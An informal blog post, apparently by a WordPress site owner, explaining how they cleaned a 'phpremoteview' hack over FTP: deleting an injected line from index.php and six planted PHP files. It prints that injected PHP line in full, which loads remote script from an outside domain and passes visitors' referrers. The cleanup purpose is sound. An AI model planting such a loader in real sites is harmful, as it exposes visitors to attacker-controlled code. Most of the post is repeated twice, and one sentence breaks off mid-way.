PhpRemoteView Wordpress Hack SOLVED
So I recently tried to log in to my wordpress site, and BAM!
Some stupid phpremoteview hack had disabled me from logging in and checking my precious word press stats! And as most of us know..us internet marketers LOVE our stats!
Anyways I found a sweet link via Google that solved my problem asap!
Credit goes to Dennis Fan of TechSpheria
Here's what I did to remove this stupid hack!
1. log in to your FTP client, I personally use FileZilla but you may use Fetch or some other one.
2. Locate your WordPress's index.php, remove the following script (the hackers added this script, so get rid of it)
echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';
3. Next, remove these six phony script files (also added by the hacker, but first go to your hosting account and backup your files just in case. I use GoDaddy so I just went in and backed it up, super easy to do. If
/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php
Note: I only had to delete the first 4, the last 2 files didn't exist so I caught a break. So if you don't see them then don't worry, that just means you don't have anything extra to delete.
Also don't try and open any of these files, you might catch yourself a virus! so just delete!
4. Go back to your wordpress site and and try logging in again! You should be good to go!
Some stupid phpremoteview hack had disabled me from logging in and checking my precious word press stats! And as most of us know..us internet marketers LOVE our stats!
Anyways I found a sweet link via Google that solved my problem asap!
Credit goes to Dennis Fan of TechSpheria
Here's what I did to remove this stupid hack!
1. log in to your FTP client, I personally use FileZilla but you may use Fetch or some other one.
2. Locate your WordPress's index.php, remove the following script (the hackers added this script, so get rid of it)
echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';
3. Next, remove these six phony script files (also added by the hacker, but first go to your hosting account and backup your files just in case. I use GoDaddy so I just went in and backed it up, super easy to do. If
/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php
Note: I only had to delete the first 4, the last 2 files didn't exist so I caught a break. So if you don't see them then don't worry, that just means you don't have anything extra to delete.
Also don't try and open any of these files, you might catch yourself a virus! so just delete!
4. Go back to your wordpress site and and try logging in again! You should be good to go!
